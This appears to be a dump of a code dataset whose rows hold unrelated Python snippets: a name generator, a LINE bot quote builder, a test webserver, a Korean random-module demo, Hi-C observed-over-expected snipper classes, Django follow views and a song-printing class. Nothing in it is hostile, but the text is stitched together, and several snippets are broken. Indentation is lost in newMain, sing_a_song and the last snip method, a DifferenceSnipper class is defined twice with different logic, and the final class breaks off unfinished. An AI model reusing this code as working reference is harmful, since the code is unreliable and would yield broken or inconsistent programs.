      * `initPoint (...)` was *calling* the tuple instead of assigning it
        (missing `=`), which raised TypeError.
      * getPoint never returned the computed point; it now returns (x, y).
    Remaining known issues, left untouched because the function is unused:
      * pygame.surface() — presumably should be pygame.Surface(size); TODO confirm.
      * `angle` is drawn in degrees (0..360) but is passed straight to
        sin/cos — NOTE(review): confirm whether radians were intended.
    """
    segment_length = (50, 100)
    surface = pygame.surface()
    shape_center = (150, 150)
    shape_variance = (100, 100)
    def getPoint(initPoint=(-1, -1)):
        # Default sentinel means "start from a random point near center".
        if initPoint == (-1, -1):
            initPoint = (shape_center[0] + random.randint(-shape_variance[0], shape_variance[0]),
                         shape_center[1] + random.randint(-shape_variance[1], shape_variance[1]))
        angle = random.randint(0, 360)
        segment_len = random.randint(segment_length[0], segment_length[1])
        x = initPoint[0] + segment_len * sin(angle)
        y = initPoint[1] + segment_len * cos(angle)
        return (x, y)
def newMain():
global countrySylables
global firstNames
global properTitles
#print item()
#print adjectives[random.randint(5,len(adjectives)-6)]
#clean the names
newNames = []
for i in range(0,len(firstNames)):
newNames.append(firstNames[i].split())
firstNames = sum(newNames,[])
#clean the titles
newNames = []
for i in range(0,len(properTitles)):
newNames.append(properTitles[i].split())
properTitles = sum(newNames,[])
#clean and sylabate the country names
countrySylables = split_by_syllable(countryNames)
for i in range(0,10):
#print descriptive_area()
print name()
newMain()
|
996,157 | 50eae9bae36fa7af616c1f0bc161d5552204bc9b | # some future comment
from line_bot_app.constants import AcceptedUserTextMessages
import random
def get_quote_flex_message(quotesAndAuthors="", imageUrl="", quoteText="", quoteAuthor=""):
    """Build a LINE Flex Message bubble that shows a random quote.

    Parameters:
        quotesAndAuthors: sequence of dicts with optional "text" and
            "author" keys; one entry is chosen at random.
        imageUrl: URL of the hero image shown in the bubble.
        quoteText / quoteAuthor: fallbacks used only when
            quotesAndAuthors is empty. Previously the empty default ("")
            made random.choice raise IndexError; now the provided
            fallbacks are used instead.

    Returns the flex message bubble as a dict.
    """
    if quotesAndAuthors:
        randomEntryInResponse = random.choice(quotesAndAuthors)
        quoteText, quoteAuthor = randomEntryInResponse.get("text", ""), randomEntryInResponse.get("author", "")
    return {
        "type": "bubble",
        "size": "kilo",
        "header": {
            "type": "box",
            "layout": "vertical",
            "contents": [
                {
                    "type": "text",
                    "text": "#Random Quote",
                    "weight": "bold",
                    "style": "italic",
                    "decoration": "underline",
                    "align": "center",
                    "size": "xl",
                    "margin": "xs",
                    "color": "#2b2a27"
                }
            ],
            "backgroundColor": "#ffd42b"
        },
        "hero": {
            "type": "image",
            "url": imageUrl,
            "size": "full",
            "aspectRatio": "17:10",
            "aspectMode": "cover",
            "margin": "none"
        },
        "body": {
            "type": "box",
            "layout": "vertical",
            "contents": [
                {
                    "type": "text",
                    "text": quoteText,
                    "weight": "bold",
                    "size": "lg",
                    "wrap": True,
                    "color": "#2b2a27"
                },
                {
                    "type": "text",
                    "text": "~" + quoteAuthor + "~",
                    "margin": "sm",
                    "color": "#2b2a2a"
                }
            ],
            "backgroundColor": "#ffd42b",
            "borderWidth": "none",
            "cornerRadius": "none",
            "margin": "none",
            "spacing": "none"
        },
        "footer": {
            "type": "box",
            "layout": "vertical",
            "spacing": "sm",
            "contents": [
                {
                    "type": "button",
                    "action": {
                        "type": "message",
                        "label": "Another Quote Please",
                        "text": AcceptedUserTextMessages.QUOTE.value
                    },
                    "position": "relative",
                    "margin": "sm",
                    "height": "sm",
                    "style": "primary",
                    "color": "#e6be20"
                }
            ],
            "flex": 0
        }
    }
|
996,158 | 9eb704115981ed9d4b3cc829125d3721786c7c20 | #
# A simple webserver MEANT FOR TESTING based off of http.server.
#
import http.server
import socketserver
import os
from multiprocessing import Process
import generate
import yaml
from threading import Timer
# Credit: http://stackoverflow.com/a/13151299/6388442
class RepeatedTimer(object):
    """Call `function(*args, **kwargs)` every `interval` seconds using a
    chain of one-shot threading.Timer objects; starts immediately on
    construction and repeats until stop() is called."""

    def __init__(self, interval, function, *args, **kwargs):
        # interval: seconds between invocations.
        # function: callable to invoke; extra args/kwargs are forwarded.
        self._timer = None
        self.interval = interval
        self.function = function
        self.args = args
        self.kwargs = kwargs
        self.is_running = False
        self.start()  # auto-start: first call fires after `interval`

    def _run(self):
        # Timer callback: re-arm the next timer *before* invoking the
        # callback so a slow callback does not delay the schedule.
        self.is_running = False
        self.start()
        self.function(*self.args, **self.kwargs)

    def start(self):
        """Arm a one-shot Timer for the next invocation (no-op if already armed)."""
        if not self.is_running:
            self._timer = Timer(self.interval, self._run)
            self._timer.start()
            self.is_running = True

    def stop(self):
        """Cancel the pending Timer and stop repeating."""
        self._timer.cancel()
        self.is_running = False
def serve(PORT=80, SERVE="."):
    """Launch the static file server and the periodic site regenerator,
    each in its own child process, then return immediately."""
    workers = (
        Process(target=rawServe, args=[PORT, SERVE]),
        Process(target=autoGen),
    )
    for worker in workers:
        worker.start()
def rawServe(PORT, SERVE):
    """Serve static files from SERVE (relative to this file) on PORT.

    Blocks in serve_forever() until interrupted with Ctrl-C.
    """
    print("rawServe started.")
    target_dir = os.path.join(os.path.dirname(__file__), SERVE)
    os.chdir(target_dir)
    server = socketserver.TCPServer(("", PORT), http.server.SimpleHTTPRequestHandler)
    print("Serving at port: ", PORT)
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        print("^C: Ending rawServe...")
def autoGen():
    """Periodically regenerate the site according to config/painless.yml.

    Reads `options.reloadTime` (seconds) and `options.outputDirectory`
    from the config and schedules generate.generate on a RepeatedTimer.
    Fixes over the previous revision: the config file handle was never
    closed (open(...).read() leaked it), and bare yaml.load — deprecated
    and unsafe for untrusted YAML — is replaced with yaml.safe_load.
    """
    print("AutoGen started.")
    print("Loading config...")
    with open("config/painless.yml", "r") as config_file:
        config = yaml.safe_load(config_file)
    print("Setting timer...")
    rt = RepeatedTimer(config["options"]["reloadTime"], generate.generate, config["options"]["outputDirectory"])  # Auto-starts
|
996,159 | 84c8b818d48c3bc26af113552ba465ff53813035 | import random
# Demonstrations of the `random` module (output labels are in Korean).
print(f'0 <= r < 1 사이의 랜덤 실수: {random.random()}')  # float in [0, 1)
print(f'0~9까지 랜덤 정수: {int(random.random() * 10)}')  # scale-and-truncate: 0..9
print(f'0~10까지 랜덤 정수: {int(random.random() * 10)+1}')  # NOTE(review): yields 1..10, label says 0~10
print(f'0~2까지 랜덤 정수: {int(random.random() * 10)%3}')  # modulo maps 0..9 onto 0..2
print(f'시작 <= r < 끝 랜덤 실수: {random.uniform(2.5 , 10.0)}')  # float in [2.5, 10.0]
print(f'0~9까지 랜덤 정수: {random.randrange(9+1)}')  # randrange stop is exclusive: 0..9
print(f'0~10까지 랜덤 정수: {random.randrange(1, 10+1)}')  # NOTE(review): yields 1..10, label says 0~10
print(f'0~10까지 랜덤 정수: {random.randint(1, 10)}')  # randint is inclusive on both ends: 1..10
print(f'0~2까지 랜덤 정수: {random.randrange(0,2)}')  # NOTE(review): yields 0..1, label says 0~2
# Pick one random element from a sequence.
season = ['봄', '여름', '가을', '겨울']
print(f'season 중 랜덤한 하나 요소 :{random.choice(season)}')
foods = ['핫도그','토스트','비빔면']
print(f'오늘 뭐 먹을래? {random.choice(foods)}')
# Class roster 1..17 without student 4; shuffle in place, then sample 3 without replacement.
반3 = list(range(1, 17+1))
반3.remove(4)
print(반3)
random.shuffle(반3)
print(반3)
print(random.sample(반3, 3))
|
996,160 | 5c2d9e93686756b1dd62fdea6bc1c09c8c9dd908 | import os
import numpy as np
import pandas as pd
import scipy.sparse as sp
from scipy.interpolate import interp1d
import scipy.signal as signal
import multiprocess as mp
import cooler
import cooltools.snipping as snipping
from cooltools.lib.numutils import logbins
import bioframe
from mirnylib.numutils import zoomArray
import DNA_info
def clean_up_loops(loop_list, arms):
    '''Remove loops that fall outside every region in `arms` or whose two
    anchors lie in different regions. Use this to clean up a new list of
    loops and save the modified list for future use.

    Parameters
    ----------
    loop_list : DataFrame with columns 'chrom1', 'pos1', 'chrom2', 'pos2'.
    arms : iterable of (chrom, start, end) region triples (extra elements
        beyond the first three are ignored).

    Returns a copy of `loop_list` restricted to loops whose anchors both
    fall strictly inside the same region, keeping only the four anchor
    columns.

    Note: the previous row-wise DataFrame.apply implementation is
    replaced with vectorized boolean masks — same result, one pass per
    arm instead of one Python call per row.
    '''
    for col in ('chrom1', 'chrom2', 'pos1', 'pos2'):
        assert col in loop_list.columns
    features = loop_list.copy(deep=True)
    features['index1'] = -1
    features['index2'] = -1
    for i, arm in enumerate(arms):
        chrom, start, end = arm[0], arm[1], arm[2]
        # Strict inequalities reproduce the original boundary behavior.
        hit1 = (features['chrom1'] == chrom) & (features['pos1'] > start) & (features['pos1'] < end)
        hit2 = (features['chrom2'] == chrom) & (features['pos2'] > start) & (features['pos2'] < end)
        features.loc[hit1, 'index1'] = i
        features.loc[hit2, 'index2'] = i
    # Keep loops whose anchors were both assigned to the same region.
    features = features[(features['index1'] == features['index2']) & (features['index1'] != -1)]
    return features[['chrom1', 'pos1', 'chrom2', 'pos2']]
def sparseSymmetricOOE(matrix, mask, log_binning=True):
    '''Quick observed-over-expected (OOE) operation for sparse symmetric
    matrices. Used by the snipper classes to normalize contact matrices
    on support regions.

    Parameters
    ----------
    matrix : scipy.sparse COO matrix (symmetric); its .data is divided
        in place by the per-diagonal expected value and the object is
        returned.
    mask : 1-D 0/1 array marking bins with a finite balancing weight;
        used to count valid bins per diagonal.
    log_binning : if True, smooth the expected curve by averaging over
        logarithmically spaced distance bins and interpolating back to
        every diagonal.
    '''
    # A single-bin region has nothing to normalize.
    if matrix.shape[0] == 1:
        return matrix
    # Number of valid bin pairs per diagonal via FFT autocorrelation of
    # the validity mask; keep the non-negative lags.
    count_per_diag = signal.fftconvolve(mask, mask[::-1], mode='full')
    count_per_diag = np.round(count_per_diag[len(count_per_diag)//2:])
    count_per_diag = count_per_diag.astype(int)
    row, col, data = matrix.row, matrix.col, matrix.data
    # Zero out NaN/inf entries so they do not poison the diagonal sums.
    nan_indices = ~np.isfinite(data)
    data[nan_indices]=0
    diff = abs(row-col)
    # Sum of contacts per diagonal; /2 because the symmetric COO stores
    # both triangles.
    scaling = np.bincount(diff, weights=data, minlength=len(count_per_diag))/2
    assert len(scaling)==len(count_per_diag)
    if log_binning:
        # Average the expected curve in log-spaced distance bins
        # (ratio 1.2 between bin edges), then interpolate in log-log
        # space back to integer distances.
        hi = len(scaling)
        lo = 1
        ratio = 1.2
        N = int(np.log(hi / lo) / np.log(ratio))
        bins = logbins(1, len(scaling), N=N)
        bin_mids = np.sqrt(bins[1:]*bins[0:-1])
        # Label each diagonal (from 1 on) with its log-bin index.
        lab = np.concatenate(tuple((i+1)*np.ones(bins[i+1]-bins[i], dtype=int) for i in range(len(bins)-1)))
        log_scaling = np.bincount(lab,weights=scaling[1:])
        log_count = np.bincount(lab, weights=count_per_diag[1:])
        coarse_expected = log_scaling[1:]/log_count[1:]
        f = interp1d(np.log10(bin_mids), np.log10(coarse_expected), kind='linear')
        y = f(np.log10(np.arange(2,np.floor(bin_mids[-1]))))
        x = np.log10(np.arange(2,np.floor(bin_mids[-1])))
        # Extrapolate beyond the last bin midpoint using the final slope.
        xremaining = np.log10(np.arange(np.round(10**x[-1]+1),len(scaling)))
        yremaining = y[-1] + ((y[-1]-y[-2])/(x[-1]-x[-2]))*(xremaining - x[-1])
        x = np.append(x,xremaining)
        y = np.append(y,yremaining)
        fine_expected = 10**y
        fine_bins = np.round(10**x)
        # Prepend the exact expected values for diagonals 0 and 1, which
        # the log-binned interpolation does not cover.
        for i in range(1,-1,-1):
            fine_expected = np.insert(fine_expected,0,scaling[i]/count_per_diag[i])
            fine_bins = np.insert(fine_bins,0,i).astype(int)
        # Sanity check: one expected value per consecutive diagonal.
        assert np.all((fine_bins[1:]-fine_bins[0:-1])==1)
    else:
        fine_expected = scaling/count_per_diag
    # Divide every stored contact by the expected value at its distance.
    matrix.data = data/fine_expected[diff]
    # matrix.data[nan_indices] = np.nan
    return matrix
class LocalObsExpSnipper:
    '''Object whose methods are fed to cooltools.snipping.pileup function. Only works if regions that
    are fed to the select method are the same i.e. region1 MUST BE SAME AS region2.'''

    def __init__(self, clr, cooler_opts=None, log_binning=True):
        # clr: cooler.Cooler holding the contact matrix and balancing weights.
        # cooler_opts: forwarded to clr.matrix(); 'sparse' defaults to True.
        # log_binning: forwarded to sparseSymmetricOOE.
        self.clr = clr
        self.log_binning = log_binning
        self.binsize = self.clr.binsize
        self.offsets = {}
        self.pad = True
        self.cooler_opts = {} if cooler_opts is None else cooler_opts
        self.cooler_opts.setdefault('sparse', True)

    def select(self, region1, region2):
        """Fetch the matrix for a support region and normalize it to
        observed-over-expected with sparseSymmetricOOE. Also records the
        region's bin offset (relative to its chromosome) for snip()."""
        print(region1, region2)
        self.offsets[region1] = self.clr.offset(region1) - self.clr.offset(region1[0])
        self.offsets[region2] = self.clr.offset(region2) - self.clr.offset(region2[0])
        matrix = (self.clr.matrix(**self.cooler_opts)
                      .fetch(region1, region2))
        # Valid bins = bins with a finite balancing weight.
        mask = self.clr.bins().fetch(region1)
        mask = np.isfinite(mask['weight'].values).astype(int)
        matrix = sparseSymmetricOOE(matrix, mask, log_binning=self.log_binning)
        if self.cooler_opts['sparse']:
            # CSR allows efficient 2-D slicing in snip().
            matrix = matrix.tocsr()
        return matrix

    def snip(self, matrix, region1, region2, tup):
        """Extract the window tup = (start1, end1, start2, end2) (bp) from
        the matrix returned by select(), zero-padding any part that falls
        outside the region and NaN-ing empty rows/columns."""
        s1, e1, s2, e2 = tup
        offset1 = self.offsets[region1]
        offset2 = self.offsets[region2]
        binsize = self.binsize
        # Convert bp coordinates to bin indices relative to the region.
        lo1, hi1 = (s1 // binsize) - offset1, (e1 // binsize) - offset1
        lo2, hi2 = (s2 // binsize) - offset2, (e2 // binsize) - offset2
        if hi1 < 0 or hi2 < 0:
            # Debug output before the asserts below fire.
            print(region1, s1, e1, region2, s2, e2)
            print(offset1, offset2)
            print(lo1, hi1, lo2, hi2)
        assert hi1 >= 0
        assert hi2 >= 0
        m, n = matrix.shape
        dm, dn = hi1 - lo1, hi2 - lo2
        out_of_bounds = False
        pad_left = pad_right = pad_bottom = pad_top = None
        if lo1 < 0:
            pad_bottom = -lo1
            out_of_bounds = True
        if lo2 < 0:
            pad_left = -lo2
            out_of_bounds = True
        if hi1 > m:
            pad_top = dm - (hi1 - m)
            out_of_bounds = True
        if hi2 > n:
            pad_right = dn - (hi2 - n)
            out_of_bounds = True
        if out_of_bounds:
            # Clamp the window to the matrix and paste the available data
            # into a zero-filled snippet of the requested size.
            i0 = max(lo1, 0)
            i1 = min(hi1, m)
            j0 = max(lo2, 0)
            j1 = min(hi2, n)
            snippet = np.full((dm, dn), 0.0)
            snippet[pad_bottom:pad_top,
                    pad_left:pad_right] = matrix[i0:i1, j0:j1].toarray().astype(float)
            # print(m,n)
            # print(i0, i1, j0, j1)
            # print(matrix[i0:i1, j0:j1].toarray().astype(float).shape)
            # print(snippet[pad_bottom:pad_top, pad_left:pad_right].shape)
        else:
            snippet = matrix[lo1:hi1, lo2:hi2].toarray().astype(float)
        # Mark all-zero rows/columns (no data) as missing.
        # NOTE(review): axis=0 sums columns but the result masks *rows*
        # (and vice versa) — harmless for square snippets, but confirm
        # the intended axes for non-square windows.
        nan_rows = np.sum(snippet, axis=0) == 0
        nan_cols = np.sum(snippet, axis=1) == 0
        snippet[nan_rows, :] = np.nan
        snippet[:, nan_cols] = np.nan
        return snippet
class DifferenceSnipper:
    '''Object whose methods are fed to cooltools.snipping.pileup function. Only works if regions that
    are fed to the select method are the same i.e. region1 MUST BE SAME AS region2.

    Produces snippets of the *difference* between two coolers' O/E maps
    (clr1 - clr2).'''

    def __init__(self, clr1, clr2, cooler_opts=None, log_binning=True):
        # clr1, clr2: cooler.Cooler objects to compare; must share a binsize.
        # cooler_opts: forwarded to .matrix(); 'sparse' defaults to True.
        # log_binning: forwarded to sparseSymmetricOOE.
        self.clr1 = clr1
        self.clr2 = clr2
        self.log_binning = log_binning
        assert clr1.binsize == clr2.binsize
        self.binsize = self.clr1.binsize
        self.offsets = {}
        self.pad = True
        self.cooler_opts = {} if cooler_opts is None else cooler_opts
        self.cooler_opts.setdefault('sparse', True)

    def select(self, region1, region2):
        """Fetch both coolers' matrices for the support region, normalize
        each to observed-over-expected, and return their difference
        (clr1 - clr2). Bin offsets are recorded for snip()."""
        print(region1, region2)
        # Offsets are taken from clr1; binsizes are asserted equal above.
        self.offsets[region1] = self.clr1.offset(region1) - self.clr1.offset(region1[0])
        self.offsets[region2] = self.clr1.offset(region2) - self.clr1.offset(region2[0])
        matrix1 = (self.clr1.matrix(**self.cooler_opts)
                       .fetch(region1, region2))
        matrix2 = (self.clr2.matrix(**self.cooler_opts)
                       .fetch(region1, region2))
        # Valid bins per cooler = finite balancing weights.
        mask1 = self.clr1.bins().fetch(region1)
        mask1 = np.isfinite(mask1['weight'].values).astype(int)
        mask2 = self.clr2.bins().fetch(region1)
        mask2 = np.isfinite(mask2['weight'].values).astype(int)
        matrix1 = sparseSymmetricOOE(matrix1, mask1, log_binning=self.log_binning)
        matrix2 = sparseSymmetricOOE(matrix2, mask2, log_binning=self.log_binning)
        # Dense subtraction, then back to sparse for slicing in snip().
        matrix = sp.coo_matrix(matrix1.todense() - matrix2.todense())
        if self.cooler_opts['sparse']:
            matrix = matrix.tocsr()
        return matrix

    def snip(self, matrix, region1, region2, tup):
        """Extract the window tup = (start1, end1, start2, end2) (bp) from
        the difference matrix returned by select(), zero-padding any part
        that falls outside the region and NaN-ing empty rows/columns."""
        s1, e1, s2, e2 = tup
        offset1 = self.offsets[region1]
        offset2 = self.offsets[region2]
        binsize = self.binsize
        # Convert bp coordinates to bin indices relative to the region.
        lo1, hi1 = (s1 // binsize) - offset1, (e1 // binsize) - offset1
        lo2, hi2 = (s2 // binsize) - offset2, (e2 // binsize) - offset2
        if hi1 < 0 or hi2 < 0:
            # Debug output before the asserts below fire.
            print(region1, s1, e1, region2, s2, e2)
            print(offset1, offset2)
            print(lo1, hi1, lo2, hi2)
        assert hi1 >= 0
        assert hi2 >= 0
        m, n = matrix.shape
        dm, dn = hi1 - lo1, hi2 - lo2
        out_of_bounds = False
        pad_left = pad_right = pad_bottom = pad_top = None
        if lo1 < 0:
            pad_bottom = -lo1
            out_of_bounds = True
        if lo2 < 0:
            pad_left = -lo2
            out_of_bounds = True
        if hi1 > m:
            pad_top = dm - (hi1 - m)
            out_of_bounds = True
        if hi2 > n:
            pad_right = dn - (hi2 - n)
            out_of_bounds = True
        if out_of_bounds:
            # Clamp the window to the matrix and paste the available data
            # into a zero-filled snippet of the requested size.
            i0 = max(lo1, 0)
            i1 = min(hi1, m)
            j0 = max(lo2, 0)
            j1 = min(hi2, n)
            snippet = np.full((dm, dn), 0.0)
            snippet[pad_bottom:pad_top,
                    pad_left:pad_right] = matrix[i0:i1, j0:j1].toarray().astype(float)
            # print(m,n)
            # print(i0, i1, j0, j1)
            # print(matrix[i0:i1, j0:j1].toarray().astype(float).shape)
            # print(snippet[pad_bottom:pad_top, pad_left:pad_right].shape)
        else:
            snippet = matrix[lo1:hi1, lo2:hi2].toarray().astype(float)
        # Mark all-zero rows/columns (no data) as missing.
        # NOTE(review): axis=0 sums columns but the result masks *rows*
        # (and vice versa) — harmless for square snippets, but confirm
        # the intended axes for non-square windows.
        nan_rows = np.sum(snippet, axis=0) == 0
        nan_cols = np.sum(snippet, axis=1) == 0
        snippet[nan_rows, :] = np.nan
        snippet[:, nan_cols] = np.nan
        return snippet
class RatioSnipper:
    '''Snipper producing observed/expected ratio snippets between two coolers.

    Its methods are fed to the cooltools.snipping.pileup function. Only works if
    the regions fed to the select method are the same, i.e. region1 MUST BE
    SAME AS region2.
    '''
    def __init__(self, clr1, clr2, cooler_opts=None, log_binning=True):
        """Store the two coolers (which must share a bin size) and fetch options."""
        self.clr1 = clr1
        self.clr2 = clr2
        self.log_binning = log_binning
        # Snippets are addressed in bins, so both coolers must be binned identically.
        assert clr1.binsize == clr2.binsize
        self.binsize = self.clr1.binsize
        # Per-region bin offsets, filled lazily by select().
        self.offsets = {}
        self.pad = True
        self.cooler_opts = {} if cooler_opts is None else cooler_opts
        self.cooler_opts.setdefault('sparse', True)
    def select(self, region1, region2):
        """Fetch both coolers' O/E matrices for the region pair and return their ratio (dense)."""
        print(region1, region2)
        # Bin offset of each region's start relative to its chromosome start;
        # clr1 is used for both lookups since the coolers share binning.
        self.offsets[region1] = self.clr1.offset(region1) - self.clr1.offset(region1[0])
        self.offsets[region2] = self.clr1.offset(region2) - self.clr1.offset(region2[0])
        matrix1 = (self.clr1.matrix(**self.cooler_opts)
                   .fetch(region1, region2))
        matrix2 = (self.clr2.matrix(**self.cooler_opts)
                   .fetch(region1, region2))
        # Bin-level validity masks: bins with a finite balancing weight.
        mask1 = self.clr1.bins().fetch(region1)
        mask1 = np.isfinite(mask1['weight'].values).astype(int)
        mask2 = self.clr2.bins().fetch(region1)
        mask2 = np.isfinite(mask2['weight'].values).astype(int)
        matrix1 = sparseSymmetricOOE(matrix1, mask1, log_binning=self.log_binning)
        matrix2 = sparseSymmetricOOE(matrix2, mask2, log_binning=self.log_binning)
        # Replace zeros with 1 in both matrices so the elementwise ratio stays finite.
        matrix1 = matrix1.todense()
        matrix1[matrix1==0] = 1
        matrix2 = matrix2.todense()
        matrix2[matrix2==0] = 1
        matrix = matrix1/matrix2
        return matrix
    def snip(self, matrix, region1, region2, tup):
        """Cut the genomic window (s1, e1, s2, e2) out of `matrix`.

        Coordinates are converted to bin indices via self.binsize and the
        offsets recorded by select(). Out-of-bounds parts are zero-padded;
        all-zero rows/columns of the result are overwritten with NaN.
        """
        s1, e1, s2, e2 = tup
        offset1 = self.offsets[region1]
        offset2 = self.offsets[region2]
        binsize = self.binsize
        # Genomic coordinates -> bin indices, shifted so 0 is the region start.
        lo1, hi1 = (s1 // binsize) - offset1, (e1 // binsize) - offset1
        lo2, hi2 = (s2 // binsize) - offset2, (e2 // binsize) - offset2
        if hi1 < 0 or hi2 < 0:
            # Diagnostic dump before the asserts below fire.
            print(region1, s1, e1, region2, s2, e2)
            print(offset1, offset2)
            print(lo1, hi1, lo2, hi2)
        assert hi1 >= 0
        assert hi2 >= 0
        m, n = matrix.shape
        dm, dn = hi1 - lo1, hi2 - lo2
        out_of_bounds = False
        pad_left = pad_right = pad_bottom = pad_top = None
        if lo1 < 0:
            pad_bottom = -lo1
            out_of_bounds = True
        if lo2 < 0:
            pad_left = -lo2
            out_of_bounds = True
        if hi1 > m:
            pad_top = dm - (hi1 - m)
            out_of_bounds = True
        if hi2 > n:
            pad_right = dn - (hi2 - n)
            out_of_bounds = True
        if out_of_bounds:
            # Clip the window to the matrix and paste it into a zero-filled frame.
            i0 = max(lo1, 0)
            i1 = min(hi1, m)
            j0 = max(lo2, 0)
            j1 = min(hi2, n)
            snippet = np.full((dm, dn), 0.0)
            snippet[pad_bottom:pad_top,
                    pad_left:pad_right] = np.asarray(matrix[i0:i1, j0:j1]).astype(float)
        else:
            snippet = np.asarray(matrix[lo1:hi1, lo2:hi2]).astype(float)
        # Bug fix: all-zero ROWS are detected by summing along axis=1 (per-row
        # totals) and all-zero COLUMNS along axis=0 (per-column totals). The
        # original had the axes swapped, which mislabeled bad rows/columns on
        # asymmetric snippets and raised IndexError whenever dm != dn.
        nan_rows = np.sum(snippet, axis=1) == 0
        nan_cols = np.sum(snippet, axis=0) == 0
        snippet[nan_rows, :] = np.nan
        snippet[:, nan_cols] = np.nan
        return snippet
class DifferenceSnipper:
    '''Object whose methods are fed to cooltools.snipping.pileup function. Only works if regions that
    are fed to the select method are the same i.e. region1 MUST BE SAME AS region2.'''
    def __init__(self, clr1, clr2, cooler_opts=None, log_binning=True):
        """Store the two coolers (which must share a bin size) and fetch options."""
        self.clr1 = clr1
        self.clr2 = clr2
        self.log_binning = log_binning
        # Snippets are addressed in bins, so both coolers must be binned identically.
        assert clr1.binsize == clr2.binsize
        self.binsize = self.clr1.binsize
        # Per-region bin offsets, filled lazily by select().
        self.offsets = {}
        self.pad = True
        self.cooler_opts = {} if cooler_opts is None else cooler_opts
        self.cooler_opts.setdefault('sparse', True)
    def select(self, region1, region2):
        """Fetch both coolers' O/E matrices for the region pair and return their difference (dense)."""
        print(region1, region2)
        # Bin offset of each region's start relative to its chromosome start;
        # clr1 is used for both lookups since the coolers share binning.
        self.offsets[region1] = self.clr1.offset(region1) - self.clr1.offset(region1[0])
        self.offsets[region2] = self.clr1.offset(region2) - self.clr1.offset(region2[0])
        matrix1 = (self.clr1.matrix(**self.cooler_opts)
                   .fetch(region1, region2))
        matrix2 = (self.clr2.matrix(**self.cooler_opts)
                   .fetch(region1, region2))
        # Bin-level validity masks: bins with a finite balancing weight.
        mask1 = self.clr1.bins().fetch(region1)
        mask1 = np.isfinite(mask1['weight'].values).astype(int)
        mask2 = self.clr2.bins().fetch(region1)
        mask2 = np.isfinite(mask2['weight'].values).astype(int)
        matrix1 = sparseSymmetricOOE(matrix1, mask1, log_binning=self.log_binning)
        matrix2 = sparseSymmetricOOE(matrix2, mask2, log_binning=self.log_binning)
        # NOTE(review): the zeros->1 substitution guards a *division* and looks
        # copied from RatioSnipper; for a difference it only changes cells where
        # exactly one matrix is zero — confirm this is intended here.
        matrix1 = matrix1.todense()
        matrix1[matrix1==0] = 1
        matrix2 = matrix2.todense()
        matrix2[matrix2==0] = 1
        matrix = matrix1 - matrix2
#         if self.cooler_opts['sparse']:
#             matrix = matrix.tocsr()
        return matrix
def snip(self, matrix, region1, region2, tup):
s1, e1, s2, e2 = tup
offset1 = self.offsets[region1]
offset2 = self.offsets[region2]
binsize = self.binsize
lo1, hi1 = (s1 // binsize) - offset1, (e1 // binsize) - offset1
lo2, hi2 = (s2 // binsize) - offset2, (e2 // binsize) - offset2
if hi1 < 0 or hi2 < 0:
print(region1, s1, e1, region2, s2, e2)
print(offset1, offset2)
print(lo1, hi1, lo2, hi2)
assert hi1 >= 0
assert hi2 >= 0
m, n = matrix.shape
dm, dn = hi1 - lo1, hi2 - lo2
out_of_bounds = False
pad_left = pad_right = pad_bottom = pad_top = None
if lo1 < 0:
pad_bottom = -lo1
out_of_bounds = True
if lo2 < 0:
pad_left = -lo2
out_of_bounds = True
if hi1 > m:
pad_top = dm - (hi1 - m)
out_of_bounds = True
if hi2 > n:
pad_right = dn - (hi2 - n)
out_of_bounds = True
if out_of_bounds:
i0 = max(lo1, 0)
i1 = min(hi1, m)
j0 = max(lo2, 0)
j1 = min(hi2, n)
snippet = np.full((dm, dn), 0.0)
snippet[pad_bottom:pad_top,
pad_left:pad_right] = np.asarray(matrix[i0:i1, j0:j1]).astype(float)
# print(m,n)
# print(i0, i1, j0, j1)
# print(matrix[i0:i1, j0:j1].toarray().astype(float).shape)
# print(snippet[pad_bottom:pad_top, pad_left:pad_right].shape)
else:
snippet = np.asarray(matrix[lo1:hi1, lo2:hi2]).astype(float)
nan_rows = np.sum(snippet, axis=0) == 0
nan_cols = np.sum(snippet, axis=1) == 0
snippet[nan_rows, :] = np.nan
snippet[:, nan_cols] = np.nan
return snippet |
996,161 | 2d2a164adb548781b4f27aa3e7e41d96e70e50f6 | from django.shortcuts import get_object_or_404
from rest_framework.generics import (
ListCreateAPIView, ListAPIView, DestroyAPIView
)
from rest_framework.permissions import IsAuthenticated
from accounts.models import User
from .models import Follow
from .serializers import FolloweeSerializer, FollowSerializer
class FollowingView(ListCreateAPIView):
    """List the users the authenticated user follows, or create a new follow."""
    permission_classes = (IsAuthenticated,)

    def get_queryset(self):
        # Only the requesting user's own followees are visible here.
        return self.request.user.following.all()

    def get_serializer_class(self):
        # Writes use the relationship serializer; reads use the followee view.
        return FollowSerializer if self.request.method == 'POST' else FolloweeSerializer

    def perform_create(self, serializer):
        # Stamp the authenticated user as the follower side of the new relation.
        serializer.save(follower=self.request.user)
class FollowerView(ListAPIView):
    """List the users who follow the authenticated user."""
    permission_classes = (IsAuthenticated,)
    serializer_class = FolloweeSerializer
    def get_queryset(self):
        # Reverse side of the follow relation for the requesting user.
        return self.request.user.followers.all()
class FollowerListView(ListAPIView):
    """Publicly list the followers of the user given by the `pk` URL kwarg."""
    serializer_class = FolloweeSerializer

    def get_queryset(self):
        # 404 when the target user does not exist.
        target = get_object_or_404(User, pk=self.kwargs['pk'])
        return target.followers.all()
class FollowingListView(ListAPIView):
    """Publicly list who the user given by the `pk` URL kwarg is following."""
    serializer_class = FolloweeSerializer

    def get_queryset(self):
        # 404 when the target user does not exist.
        target = get_object_or_404(User, pk=self.kwargs['pk'])
        return target.following.all()
class UnfollowView(DestroyAPIView):
    """Remove the follow relation from the requester to the targeted user."""
    permission_classes = (IsAuthenticated,)

    def get_queryset(self):
        # Deletable objects are restricted to users the requester follows.
        return self.request.user.following.all()

    def perform_destroy(self, instance):
        # `instance` is the followee user; delete the joining Follow row instead.
        Follow.objects.get(from_user=self.request.user, to_user=instance).delete()
|
996,162 | 5be9b3f252dbfe8d7deedcb5c04d6a746c93a9d0 | class Songs(object):
    def __init__(self, lyrics):
        """Store the lyrics (an iterable of lines) for later singing."""
        self.lyrics = lyrics
def sing_a_song(self):
for line in self.lyrics:
print(line)
# Demo: construct a singer from an inline lyrics list and perform it.
alphaand = Songs(["Reach into the nothingness",
"Consuming your sight"])
alphaand.sing_a_song()
# Lyrics may also be built separately and handed to the constructor.
mechanobiology = ["Contact, ended abruptly.","Signal lost, and without warning"]
mechanobiology_singer = Songs(mechanobiology)
mechanobiology_singer.sing_a_song() |
996,163 | 8f9fcd0dc60ca40e69e708c66ee06267dbb3ebc9 |
import torchvision.transforms as transforms
class Augmentation:
    def __init__(self):
